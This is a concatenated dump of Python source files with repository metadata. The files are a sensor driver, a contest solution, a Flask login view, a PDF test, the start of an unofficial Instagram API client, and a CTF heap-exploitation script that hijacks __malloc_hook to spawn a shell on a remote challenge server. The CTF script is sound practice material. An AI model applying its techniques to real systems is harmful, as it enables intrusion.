# https://www.controleverything.com/content/Temperature?sku=ADT75_I2CS#tabs-0-product_tabset-2
import smbus
import time
# Get I2C bus
bus = smbus.SMBus(1)
# I2C Address of the device
ADT75_DEFAULT_ADDRESS = 0x48
# ADT75 Register Map
ADT75_REG_TEMP = 0x00 # Temperature Value
ADT75_REG_CONFIG = 0x01 # Configuration Register
ADT75_REG_THYST = 0x02 # THYST setpoint
ADT75_REG_TOS = 0x03 # TOS setpoint
# ADT75 Configuration Register
ADT75_MODE_NORMAL = 0x00 # Normal Mode
ADT75_MODE_ONESHOT = 0x20 # One-Shot Mode
ADT75_FAULTQUEUE_1 = 0x00 # Fault Queue = 1
ADT75_FAULTQUEUE_2 = 0x08 # Fault Queue = 2
ADT75_FAULTQUEUE_4 = 0x10 # Fault Queue = 4
ADT75_FAULTQUEUE_6 = 0x18 # Fault Queue = 6
ADT75_MODE_CMP = 0x00 # Comparater Mode
ADT75_MODE_INT = 0x02 # Interrupt Mode
ADT75_MODE_SHUTDOWN = 0x01 # Shutdown Mode
class ADT75():
def __init__(self):
self.temp_configuration()
def temp_configuration(self):
"""Select the temperature configuration from the given provided values"""
TEMP_CONFIG = (ADT75_MODE_NORMAL | ADT75_FAULTQUEUE_1 | ADT75_MODE_CMP)
bus.write_byte_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_CONFIG, TEMP_CONFIG)
def read_temp(self):
"""Read data back from ADT75_REG_TEMP(0x00), 2 bytes, temp MSB, temp LSB"""
data = bus.read_i2c_block_data(ADT75_DEFAULT_ADDRESS, ADT75_REG_TEMP, 2)
# Convert the data to 12-bits
temp = ((data[0] * 256) + data[1]) / 16
if temp > 2047 :
temp -= 4096
cTemp = temp * 0.0625
fTemp = (cTemp * 1.8) + 32
return {'c' : cTemp, 'f' : fTemp}
from ADT75 import ADT75
adt75 = ADT75()
while True:
temp = adt75.read_temp()
print "Temperature in Celsius : %.2f C"%(temp['c'])
print "Temperature in Fahrenheit : %.2f F"%(temp['f'])
print " ***************************************** "
time.sleep(1)
|
[
"ryker1990@gmail.com"
] |
ryker1990@gmail.com
|
e05e44ea2d5ee7d245bc918ab507c0a29739aaae
|
8692807f1dfa8c18c61df07cfafbbd27d4e66fba
|
/LONG-CHALLENGE/PROXYC.sol.py
|
cead1b911458e67e7b124171a7ef3ddec767cfb8
|
[] |
no_license
|
sharmakajal0/codechef_problems
|
00381e9bf1996b859e46f087c2ffafd9d7a10ef1
|
0b979029e0a821f47fbdd6f9c624daee785a02e7
|
refs/heads/master
| 2020-05-29T15:04:40.459979
| 2020-03-29T08:44:53
| 2020-03-29T08:44:53
| 189,212,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
#!/usr/bin/env python
import string
import random
for _ in range(int(input())):
D = int(input())
P = 0
proxy = 0
S = input()
for i in range(len(S)):
if(S[i] == 'P'):
P += 1
A = P/D
if A >= 0.75:
print(proxy)
else:
for d in range(D):
if d == 1 and d == 2 and d == D - 1 and d == D - 2:
proxy += 0
elif d == 'P' and d + 1 =='P':
proxy += 1
else:
proxy += 0
continue
# else:
# proxy = proxy + 1
# break
P = P + proxy
A = P / D
if A >= 0.75:
print(proxy)
else:
print("-1")
|
[
"sharma.kajal.sitm@gmail.com"
] |
sharma.kajal.sitm@gmail.com
|
c339f9eb2a18aa108c8f03d0636db2b68a387b05
|
487aab917a808b30ebeccf90cd15ed59ac9d776b
|
/Server/app/views/account/auth.py
|
00563a701cf1bf96abd6f713b7d59feb79dee4b7
|
[] |
no_license
|
DSM-DMS/DMS-OpenAPI-Backend
|
62fffc913b5cb562fbca3333223f8abfb2cf2a8a
|
1f0c434e98c4cc5d2150af6f533109b1797d8659
|
refs/heads/master
| 2020-03-20T19:48:56.576943
| 2018-06-18T06:45:05
| 2018-06-18T06:45:05
| 137,655,168
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
from flask import Blueprint, Response, request
from flask_jwt_extended import create_access_token, create_refresh_token
from flask_restful import Api
from flasgger import swag_from
from app.docs.account.auth import *
from app.models.account import StudentModel, TokenModel, AccessTokenModel, RefreshTokenModel
from app.views import BaseResource, json_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/student'
@api.resource('/auth')
class Auth(BaseResource):
@json_required({'id': str, 'password': str})
@swag_from(AUTH_POST)
def post(self):
"""
학생 로그인
"""
payload = request.json
student = StudentModel.objects(id=payload['id'], pw=self.encrypt_password(payload['password'])).first()
return ({
'accessToken': create_access_token(TokenModel.generate_token(AccessTokenModel, student, request.headers['USER-AGENT'])),
'refreshToken': create_refresh_token(TokenModel.generate_token(RefreshTokenModel, student, request.headers['USER-AGENT']))
}, 201) if student else Response('', 401)
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
204b4e459a1699224604a3af5706b1de46d495db
|
673e829dda9583c8dd2ac8d958ba1dc304bffeaf
|
/data/multilingual/Latn.TZH/Serif_12/pdf_to_json_test_Latn.TZH_Serif_12.py
|
cd6289fc1d1643cc357cf40015e0694b8ed2d3ee
|
[
"BSD-3-Clause"
] |
permissive
|
antoinecarme/pdf_to_json_tests
|
58bab9f6ba263531e69f793233ddc4d33b783b7e
|
d57a024fde862e698d916a1178f285883d7a3b2f
|
refs/heads/master
| 2021-01-26T08:41:47.327804
| 2020-02-27T15:54:48
| 2020-02-27T15:54:48
| 243,359,934
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TZH/Serif_12/udhr_Latn.TZH_Serif_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
337cee5e29835896cab1957d702d1c6c2b4c4d23
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/de1ctf_2019_weapon/de1ctf_2019_weapon.py
|
b20af85652888221b9c83fe6865667fded000806
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from pwn import *
#libc = ELF('libc-2.23.so')
libc = ELF('libc-2.23.buu.so')
def debug(s):
gdb.attach(p, '''
source ~/libc/loadsym.py
loadsym ~/libc/2.23/64/libc-2.23.debug.so
''' + s)
def alloc(index, size, name):
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', str(size).encode())
p.sendlineafter(b'index: ', str(index).encode())
p.sendafter(b'name:', name)
def delete(index):
p.sendlineafter(b'choice >> ', b'2')
p.sendlineafter(b'idx :', str(index).encode())
def edit(index, name):
p.sendlineafter(b'choice >> ', b'3')
p.sendlineafter(b'idx: ', str(index).encode())
p.sendafter(b'content:', name)
def exploit():
alloc(0, 0x20, p64(0) + p64(0x21))
alloc(1, 0x10, b'a')
alloc(2, 0x10, b'a')
#wtf, glibc will check the header of next chunk while free, so we need to write a fake header (0x70, 0x51)
alloc(3, 0x10, p64(0x70) + p64(0x51))
delete(1)
delete(2)
edit(2, b'\x10')
alloc(1, 0x10, b'a')
alloc(1, 0x10, b'a')
alloc(4 ,0x30, b'a')
alloc(5 ,0x30, b'a')
alloc(6, 0x10, b'a')
edit(0, p64(0) + p64(0x71))
delete(1)
edit(0, p64(0) + p64(0x101))
delete(1)
edit(0, p64(0) + p64(0x71))
edit(1, b'\xdd\x75')
alloc(0, 0x60, b'a')
alloc(0, 0x60, b'a')
alloc(6, 0x60, b'a')
payload = b'a' * ( 0x620 - 0x5ed ) + p64(0xfbad1800) + p64(0) * 3 + b'\x00'
edit(0, payload)
p.recvuntil(b'\x7f')
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 131 - libc.sym['_IO_2_1_stdout_']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc_base + one_gadgets_buu[3]
delete(6)
edit(6, p64(malloc_hook - 0x23))
#context.log_level = 'debug'
alloc(6, 0x60, b'a')
alloc(6, 0x60, b'a' * 0x13 + p64(one))
p.sendlineafter(b'choice >> ', b'1')
p.sendlineafter(b'size of weapon: ', b'1')
p.sendlineafter(b'index: ', b'1')
p.interactive()
if __name__ == '__main__':
flag = False
while not flag:
try:
#p = process('./de1ctf_2019_weapon')
p = remote('node4.buuoj.cn', 25710)
exploit()
flag = True
except:
p.close()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
9e4f89252c66d18fd18e1467a488c675ac89d9bc
|
9e679192c0396ca9dadde55d8e6d3a746c446367
|
/cineBot/lib/python3.6/site-packages/InstagramAPI/InstagramAPI.py
|
27409550b3db4f29318f333c7304c92a51772bd6
|
[
"MIT"
] |
permissive
|
furkanalpereny/cineBot
|
74dfa10e5760f0a2496ca9b8801479d9084d5df7
|
cb93b6fc6ab25ba0601067f54b6824a8462f470d
|
refs/heads/master
| 2022-12-10T10:16:11.006211
| 2019-12-23T04:11:00
| 2019-12-23T04:11:00
| 227,674,856
| 0
| 0
|
MIT
| 2022-12-08T03:19:12
| 2019-12-12T18:50:06
|
Python
|
UTF-8
|
Python
| false
| false
| 53,745
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import random
import json
import hashlib
import hmac
import urllib
import uuid
import time
import copy
import math
import sys
from datetime import datetime
import calendar
import os
from requests_toolbelt import MultipartEncoder
# Turn off InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
try:
from moviepy.editor import VideoFileClip
except:
print("Fail to import moviepy. Need only for Video upload.")
# The urllib library was split into other modules from Python 2 to Python 3
if sys.version_info.major == 3:
import urllib.parse
try:
from ImageUtils import getImageSize
except:
# Issue 159, python3 import fix
from .ImageUtils import getImageSize
class InstagramAPI:
API_URL = 'https://i.instagram.com/api/v1/'
DEVICE_SETTINTS = {'manufacturer': 'Xiaomi',
'model': 'HM 1SW',
'android_version': 18,
'android_release': '4.3'}
USER_AGENT = 'Instagram 10.26.0 Android ({android_version}/{android_release}; 320dpi; 720x1280; {manufacturer}; {model}; armani; qcom; en_US)'.format(**DEVICE_SETTINTS)
IG_SIG_KEY = '4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178'
EXPERIMENTS = 'ig_promote_reach_objective_fix_universe,ig_android_universe_video_production,ig_search_client_h1_2017_holdout,ig_android_live_follow_from_comments_universe,ig_android_carousel_non_square_creation,ig_android_live_analytics,ig_android_follow_all_dialog_confirmation_copy,ig_android_stories_server_coverframe,ig_android_video_captions_universe,ig_android_offline_location_feed,ig_android_direct_inbox_retry_seen_state,ig_android_ontact_invite_universe,ig_android_live_broadcast_blacklist,ig_android_insta_video_reconnect_viewers,ig_android_ad_async_ads_universe,ig_android_search_clear_layout_universe,ig_android_shopping_reporting,ig_android_stories_surface_universe,ig_android_verified_comments_universe,ig_android_preload_media_ahead_in_current_reel,android_instagram_prefetch_suggestions_universe,ig_android_reel_viewer_fetch_missing_reels_universe,ig_android_direct_search_share_sheet_universe,ig_android_business_promote_tooltip,ig_android_direct_blue_tab,ig_android_async_network_tweak_universe,ig_android_elevate_main_thread_priority_universe,ig_android_stories_gallery_nux,ig_android_instavideo_remove_nux_comments,ig_video_copyright_whitelist,ig_react_native_inline_insights_with_relay,ig_android_direct_thread_message_animation,ig_android_draw_rainbow_client_universe,ig_android_direct_link_style,ig_android_live_heart_enhancements_universe,ig_android_rtc_reshare,ig_android_preload_item_count_in_reel_viewer_buffer,ig_android_users_bootstrap_service,ig_android_auto_retry_post_mode,ig_android_shopping,ig_android_main_feed_seen_state_dont_send_info_on_tail_load,ig_fbns_preload_default,ig_android_gesture_dismiss_reel_viewer,ig_android_tool_tip,ig_android_ad_logger_funnel_logging_universe,ig_android_gallery_grid_column_count_universe,ig_android_business_new_ads_payment_universe,ig_android_direct_links,ig_android_audience_control,ig_android_live_encore_consumption_settings_universe,ig_perf_android_holdout,ig_android_cache_contact_import_list,ig_android_links_receivers,ig_android_ad_impression_backtest,ig_android_list_redesign,ig_android_stories_separate_overlay_creation,ig_android_stop_video_recording_fix_universe,ig_android_render_video_segmentation,ig_android_live_encore_reel_chaining_universe,ig_android_sync_on_background_enhanced_10_25,ig_android_immersive_viewer,ig_android_mqtt_skywalker,ig_fbns_push,ig_android_ad_watchmore_overlay_universe,ig_android_react_native_universe,ig_android_profile_tabs_redesign_universe,ig_android_live_consumption_abr,ig_android_story_viewer_social_context,ig_android_hide_post_in_feed,ig_android_video_loopcount_int,ig_android_enable_main_feed_reel_tray_preloading,ig_android_camera_upsell_dialog,ig_android_ad_watchbrowse_universe,ig_android_internal_research_settings,ig_android_search_people_tag_universe,ig_android_react_native_ota,ig_android_enable_concurrent_request,ig_android_react_native_stories_grid_view,ig_android_business_stories_inline_insights,ig_android_log_mediacodec_info,ig_android_direct_expiring_media_loading_errors,ig_video_use_sve_universe,ig_android_cold_start_feed_request,ig_android_enable_zero_rating,ig_android_reverse_audio,ig_android_branded_content_three_line_ui_universe,ig_android_live_encore_production_universe,ig_stories_music_sticker,ig_android_stories_teach_gallery_location,ig_android_http_stack_experiment_2017,ig_android_stories_device_tilt,ig_android_pending_request_search_bar,ig_android_fb_topsearch_sgp_fork_request,ig_android_seen_state_with_view_info,ig_android_animation_perf_reporter_timeout,ig_android_new_block_flow,ig_android_story_tray_title_play_all_v2,ig_android_direct_address_links,ig_android_stories_archive_universe,ig_android_save_collections_cover_photo,ig_android_live_webrtc_livewith_production,ig_android_sign_video_url,ig_android_stories_video_prefetch_kb,ig_android_stories_create_flow_favorites_tooltip,ig_android_live_stop_broadcast_on_404,ig_android_live_viewer_invite_universe,ig_android_promotion_feedback_channel,ig_android_render_iframe_interval,ig_android_accessibility_logging_universe,ig_android_camera_shortcut_universe,ig_android_use_one_cookie_store_per_user_override,ig_profile_holdout_2017_universe,ig_android_stories_server_brushes,ig_android_ad_media_url_logging_universe,ig_android_shopping_tag_nux_text_universe,ig_android_comments_single_reply_universe,ig_android_stories_video_loading_spinner_improvements,ig_android_collections_cache,ig_android_comment_api_spam_universe,ig_android_facebook_twitter_profile_photos,ig_android_shopping_tag_creation_universe,ig_story_camera_reverse_video_experiment,ig_android_direct_bump_selected_recipients,ig_android_ad_cta_haptic_feedback_universe,ig_android_vertical_share_sheet_experiment,ig_android_family_bridge_share,ig_android_search,ig_android_insta_video_consumption_titles,ig_android_stories_gallery_preview_button,ig_android_fb_auth_education,ig_android_camera_universe,ig_android_me_only_universe,ig_android_instavideo_audio_only_mode,ig_android_user_profile_chaining_icon,ig_android_live_video_reactions_consumption_universe,ig_android_stories_hashtag_text,ig_android_post_live_badge_universe,ig_android_swipe_fragment_container,ig_android_search_users_universe,ig_android_live_save_to_camera_roll_universe,ig_creation_growth_holdout,ig_android_sticker_region_tracking,ig_android_unified_inbox,ig_android_live_new_watch_time,ig_android_offline_main_feed_10_11,ig_import_biz_contact_to_page,ig_android_live_encore_consumption_universe,ig_android_experimental_filters,ig_android_search_client_matching_2,ig_android_react_native_inline_insights_v2,ig_android_business_conversion_value_prop_v2,ig_android_redirect_to_low_latency_universe,ig_android_ad_show_new_awr_universe,ig_family_bridges_holdout_universe,ig_android_background_explore_fetch,ig_android_following_follower_social_context,ig_android_video_keep_screen_on,ig_android_ad_leadgen_relay_modern,ig_android_profile_photo_as_media,ig_android_insta_video_consumption_infra,ig_android_ad_watchlead_universe,ig_android_direct_prefetch_direct_story_json,ig_android_shopping_react_native,ig_android_top_live_profile_pics_universe,ig_android_direct_phone_number_links,ig_android_stories_weblink_creation,ig_android_direct_search_new_thread_universe,ig_android_histogram_reporter,ig_android_direct_on_profile_universe,ig_android_network_cancellation,ig_android_background_reel_fetch,ig_android_react_native_insights,ig_android_insta_video_audio_encoder,ig_android_family_bridge_bookmarks,ig_android_data_usage_network_layer,ig_android_universal_instagram_deep_links,ig_android_dash_for_vod_universe,ig_android_modular_tab_discover_people_redesign,ig_android_mas_sticker_upsell_dialog_universe,ig_android_ad_add_per_event_counter_to_logging_event,ig_android_sticky_header_top_chrome_optimization,ig_android_rtl,ig_android_biz_conversion_page_pre_select,ig_android_promote_from_profile_button,ig_android_live_broadcaster_invite_universe,ig_android_share_spinner,ig_android_text_action,ig_android_own_reel_title_universe,ig_promotions_unit_in_insights_landing_page,ig_android_business_settings_header_univ,ig_android_save_longpress_tooltip,ig_android_constrain_image_size_universe,ig_android_business_new_graphql_endpoint_universe,ig_ranking_following,ig_android_stories_profile_camera_entry_point,ig_android_universe_reel_video_production,ig_android_power_metrics,ig_android_sfplt,ig_android_offline_hashtag_feed,ig_android_live_skin_smooth,ig_android_direct_inbox_search,ig_android_stories_posting_offline_ui,ig_android_sidecar_video_upload_universe,ig_android_promotion_manager_entry_point_universe,ig_android_direct_reply_audience_upgrade,ig_android_swipe_navigation_x_angle_universe,ig_android_offline_mode_holdout,ig_android_live_send_user_location,ig_android_direct_fetch_before_push_notif,ig_android_non_square_first,ig_android_insta_video_drawing,ig_android_swipeablefilters_universe,ig_android_live_notification_control_universe,ig_android_analytics_logger_running_background_universe,ig_android_save_all,ig_android_reel_viewer_data_buffer_size,ig_direct_quality_holdout_universe,ig_android_family_bridge_discover,ig_android_react_native_restart_after_error_universe,ig_android_startup_manager,ig_story_tray_peek_content_universe,ig_android_profile,ig_android_high_res_upload_2,ig_android_http_service_same_thread,ig_android_scroll_to_dismiss_keyboard,ig_android_remove_followers_universe,ig_android_skip_video_render,ig_android_story_timestamps,ig_android_live_viewer_comment_prompt_universe,ig_profile_holdout_universe,ig_android_react_native_insights_grid_view,ig_stories_selfie_sticker,ig_android_stories_reply_composer_redesign,ig_android_streamline_page_creation,ig_explore_netego,ig_android_ig4b_connect_fb_button_universe,ig_android_feed_util_rect_optimization,ig_android_rendering_controls,ig_android_os_version_blocking,ig_android_encoder_width_safe_multiple_16,ig_search_new_bootstrap_holdout_universe,ig_android_snippets_profile_nux,ig_android_e2e_optimization_universe,ig_android_comments_logging_universe,ig_shopping_insights,ig_android_save_collections,ig_android_live_see_fewer_videos_like_this_universe,ig_android_show_new_contact_import_dialog,ig_android_live_view_profile_from_comments_universe,ig_fbns_blocked,ig_formats_and_feedbacks_holdout_universe,ig_android_reduce_view_pager_buffer,ig_android_instavideo_periodic_notif,ig_search_user_auto_complete_cache_sync_ttl,ig_android_marauder_update_frequency,ig_android_suggest_password_reset_on_oneclick_login,ig_android_promotion_entry_from_ads_manager_universe,ig_android_live_special_codec_size_list,ig_android_enable_share_to_messenger,ig_android_background_main_feed_fetch,ig_android_live_video_reactions_creation_universe,ig_android_channels_home,ig_android_sidecar_gallery_universe,ig_android_upload_reliability_universe,ig_migrate_mediav2_universe,ig_android_insta_video_broadcaster_infra_perf,ig_android_business_conversion_social_context,android_ig_fbns_kill_switch,ig_android_live_webrtc_livewith_consumption,ig_android_destroy_swipe_fragment,ig_android_react_native_universe_kill_switch,ig_android_stories_book_universe,ig_android_all_videoplayback_persisting_sound,ig_android_draw_eraser_universe,ig_direct_search_new_bootstrap_holdout_universe,ig_android_cache_layer_bytes_threshold,ig_android_search_hash_tag_and_username_universe,ig_android_business_promotion,ig_android_direct_search_recipients_controller_universe,ig_android_ad_show_full_name_universe,ig_android_anrwatchdog,ig_android_qp_kill_switch,ig_android_2fac,ig_direct_bypass_group_size_limit_universe,ig_android_promote_simplified_flow,ig_android_share_to_whatsapp,ig_android_hide_bottom_nav_bar_on_discover_people,ig_fbns_dump_ids,ig_android_hands_free_before_reverse,ig_android_skywalker_live_event_start_end,ig_android_live_join_comment_ui_change,ig_android_direct_search_story_recipients_universe,ig_android_direct_full_size_gallery_upload,ig_android_ad_browser_gesture_control,ig_channel_server_experiments,ig_android_video_cover_frame_from_original_as_fallback,ig_android_ad_watchinstall_universe,ig_android_ad_viewability_logging_universe,ig_android_new_optic,ig_android_direct_visual_replies,ig_android_stories_search_reel_mentions_universe,ig_android_threaded_comments_universe,ig_android_mark_reel_seen_on_Swipe_forward,ig_internal_ui_for_lazy_loaded_modules_experiment,ig_fbns_shared,ig_android_capture_slowmo_mode,ig_android_live_viewers_list_search_bar,ig_android_video_single_surface,ig_android_offline_reel_feed,ig_android_video_download_logging,ig_android_last_edits,ig_android_exoplayer_4142,ig_android_post_live_viewer_count_privacy_universe,ig_android_activity_feed_click_state,ig_android_snippets_haptic_feedback,ig_android_gl_drawing_marks_after_undo_backing,ig_android_mark_seen_state_on_viewed_impression,ig_android_live_backgrounded_reminder_universe,ig_android_live_hide_viewer_nux_universe,ig_android_live_monotonic_pts,ig_android_search_top_search_surface_universe,ig_android_user_detail_endpoint,ig_android_location_media_count_exp_ig,ig_android_comment_tweaks_universe,ig_android_ad_watchmore_entry_point_universe,ig_android_top_live_notification_universe,ig_android_add_to_last_post,ig_save_insights,ig_android_live_enhanced_end_screen_universe,ig_android_ad_add_counter_to_logging_event,ig_android_blue_token_conversion_universe,ig_android_exoplayer_settings,ig_android_progressive_jpeg,ig_android_offline_story_stickers,ig_android_gqls_typing_indicator,ig_android_chaining_button_tooltip,ig_android_video_prefetch_for_connectivity_type,ig_android_use_exo_cache_for_progressive,ig_android_samsung_app_badging,ig_android_ad_holdout_watchandmore_universe,ig_android_offline_commenting,ig_direct_stories_recipient_picker_button,ig_insights_feedback_channel_universe,ig_android_insta_video_abr_resize,ig_android_insta_video_sound_always_on'''
SIG_KEY_VERSION = '4'
# username # Instagram username
# password # Instagram password
# debug # Debug
# uuid # UUID
# device_id # Device ID
# username_id # Username ID
# token # _csrftoken
# isLoggedIn # Session status
# rank_token # Rank token
# IGDataPath # Data storage path
def __init__(self, username, password, debug=False, IGDataPath=None):
m = hashlib.md5()
m.update(username.encode('utf-8') + password.encode('utf-8'))
self.device_id = self.generateDeviceId(m.hexdigest())
self.setUser(username, password)
self.isLoggedIn = False
self.LastResponse = None
self.s = requests.Session()
def setUser(self, username, password):
self.username = username
self.password = password
self.uuid = self.generateUUID(True)
def setProxy(self, proxy=None):
"""
Set proxy for all requests::
Proxy format - user:password@ip:port
"""
if proxy is not None:
print('Set proxy!')
proxies = {'http': 'http://' + proxy, 'https': 'http://' + proxy}
self.s.proxies.update(proxies)
def login(self, force=False):
if (not self.isLoggedIn or force):
if (self.SendRequest('si/fetch_headers/?challenge_type=signup&guid=' + self.generateUUID(False), None, True)):
data = {'phone_id': self.generateUUID(True),
'_csrftoken': self.LastResponse.cookies['csrftoken'],
'username': self.username,
'guid': self.uuid,
'device_id': self.device_id,
'password': self.password,
'login_attempt_count': '0'}
if (self.SendRequest('accounts/login/', self.generateSignature(json.dumps(data)), True)):
self.isLoggedIn = True
self.username_id = self.LastJson["logged_in_user"]["pk"]
self.rank_token = "%s_%s" % (self.username_id, self.uuid)
self.token = self.LastResponse.cookies["csrftoken"]
self.syncFeatures()
self.autoCompleteUserList()
self.timelineFeed()
self.getv2Inbox()
self.getRecentActivity()
print("Login success!\n")
return True
def syncFeatures(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'id': self.username_id,
'_csrftoken': self.token,
'experiments': self.EXPERIMENTS})
return self.SendRequest('qe/sync/', self.generateSignature(data))
def autoCompleteUserList(self):
return self.SendRequest('friendships/autocomplete_user_list/')
def timelineFeed(self):
return self.SendRequest('feed/timeline/')
def megaphoneLog(self):
return self.SendRequest('megaphone/log/')
def expose(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'id': self.username_id,
'_csrftoken': self.token,
'experiment': 'ig_android_profile_contextual_feed'})
return self.SendRequest('qe/expose/', self.generateSignature(data))
def logout(self):
logout = self.SendRequest('accounts/logout/')
def uploadPhoto(self, photo, caption=None, upload_id=None, is_sidecar=None):
if upload_id is None:
upload_id = str(int(time.time() * 1000))
data = {'upload_id': upload_id,
'_uuid': self.uuid,
'_csrftoken': self.token,
'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
if is_sidecar:
data['is_sidecar'] = '1'
m = MultipartEncoder(data, boundary=self.uuid)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': m.content_type,
'Connection': 'close',
'User-Agent': self.USER_AGENT})
response = self.s.post(self.API_URL + "upload/photo/", data=m.to_string())
print(response)
if response.status_code == 200:
if self.configure(upload_id, photo, caption):
self.expose()
return False
def uploadVideo(self, video, thumbnail, caption=None, upload_id=None, is_sidecar=None):
if upload_id is None:
upload_id = str(int(time.time() * 1000))
data = {'upload_id': upload_id,
'_csrftoken': self.token,
'media_type': '2',
'_uuid': self.uuid}
if is_sidecar:
data['is_sidecar'] = '1'
m = MultipartEncoder(data, boundary=self.uuid)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Host': 'i.instagram.com',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': m.content_type,
'Connection': 'keep-alive',
'User-Agent': self.USER_AGENT})
response = self.s.post(self.API_URL + "upload/video/", data=m.to_string())
if response.status_code == 200:
body = json.loads(response.text)
upload_url = body['video_upload_urls'][3]['url']
upload_job = body['video_upload_urls'][3]['job']
videoData = open(video, 'rb').read()
# solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
request_size = int(math.floor(len(videoData) / 4))
lastRequestExtra = (len(videoData) - (request_size * 3))
headers = copy.deepcopy(self.s.headers)
self.s.headers.update({'X-IG-Capabilities': '3Q4=',
'X-IG-Connection-Type': 'WIFI',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'Accept-Encoding': 'gzip, deflate',
'Content-type': 'application/octet-stream',
'Session-ID': upload_id,
'Connection': 'keep-alive',
'Content-Disposition': 'attachment; filename="video.mov"',
'job': upload_job,
'Host': 'upload.instagram.com',
'User-Agent': self.USER_AGENT})
for i in range(0, 4):
start = i * request_size
if i == 3:
end = i * request_size + lastRequestExtra
else:
end = (i + 1) * request_size
length = lastRequestExtra if i == 3 else request_size
content_range = "bytes {start}-{end}/{lenVideo}".format(start=start, end=(end - 1),
lenVideo=len(videoData)).encode('utf-8')
self.s.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range, })
response = self.s.post(upload_url, data=videoData[start:start + length])
self.s.headers = headers
if response.status_code == 200:
if self.configureVideo(upload_id, video, thumbnail, caption):
self.expose()
return False
def uploadAlbum(self, media, caption=None, upload_id=None):
if not media:
raise Exception("List of media to upload can't be empty.")
if len(media) < 2 or len(media) > 10:
raise Exception('Instagram requires that albums contain 2-10 items. You tried to submit {}.'.format(len(media)))
# Figure out the media file details for ALL media in the album.
# NOTE: We do this first, since it validates whether the media files are
# valid and lets us avoid wasting time uploading totally invalid albums!
for idx, item in enumerate(media):
if not item.get('file', '') or item.get('tipe', ''):
raise Exception('Media at index "{}" does not have the required "file" and "type" keys.'.format(idx))
# $itemInternalMetadata = new InternalMetadata();
# If usertags are provided, verify that the entries are valid.
if item.get('usertags', []):
self.throwIfInvalidUsertags(item['usertags'])
# Pre-process media details and throw if not allowed on Instagram.
if item.get('type', '') == 'photo':
# Determine the photo details.
# $itemInternalMetadata->setPhotoDetails(Constants::FEED_TIMELINE_ALBUM, $item['file']);
pass
elif item.get('type', '') == 'video':
# Determine the video details.
# $itemInternalMetadata->setVideoDetails(Constants::FEED_TIMELINE_ALBUM, $item['file']);
pass
else:
raise Exception('Unsupported album media type "{}".'.format(item['type']))
itemInternalMetadata = {}
item['internalMetadata'] = itemInternalMetadata
# Perform all media file uploads.
for idx, item in enumerate(media):
itemInternalMetadata = item['internalMetadata']
item_upload_id = self.generateUploadId()
if item.get('type', '') == 'photo':
self.uploadPhoto(item['file'], caption=caption, is_sidecar=True, upload_id=item_upload_id)
# $itemInternalMetadata->setPhotoUploadResponse($this->ig->internal->uploadPhotoData(Constants::FEED_TIMELINE_ALBUM, $itemInternalMetadata));
elif item.get('type', '') == 'video':
# Attempt to upload the video data.
self.uploadVideo(item['file'], item['thumbnail'], caption=caption, is_sidecar=True, upload_id=item_upload_id)
# $itemInternalMetadata = $this->ig->internal->uploadVideo(Constants::FEED_TIMELINE_ALBUM, $item['file'], $itemInternalMetadata);
# Attempt to upload the thumbnail, associated with our video's ID.
# $itemInternalMetadata->setPhotoUploadResponse($this->ig->internal->uploadPhotoData(Constants::FEED_TIMELINE_ALBUM, $itemInternalMetadata));
pass
item['internalMetadata']['upload_id'] = item_upload_id
albumInternalMetadata = {}
return self.configureTimelineAlbum(media, albumInternalMetadata, captionText=caption)
def throwIfInvalidUsertags(self, usertags):
for user_position in usertags:
# Verify this usertag entry, ensuring that the entry is format
# ['position'=>[0.0,1.0],'user_id'=>'123'] and nothing else.
correct = True
if isinstance(user_position, dict):
position = user_position.get('position', None)
user_id = user_position.get('user_id', None)
if isinstance(position, list) and len(position) == 2:
try:
x = float(position[0])
y = float(position[1])
if x < 0.0 or x > 1.0:
correct = False
if y < 0.0 or y > 1.0:
correct = False
except:
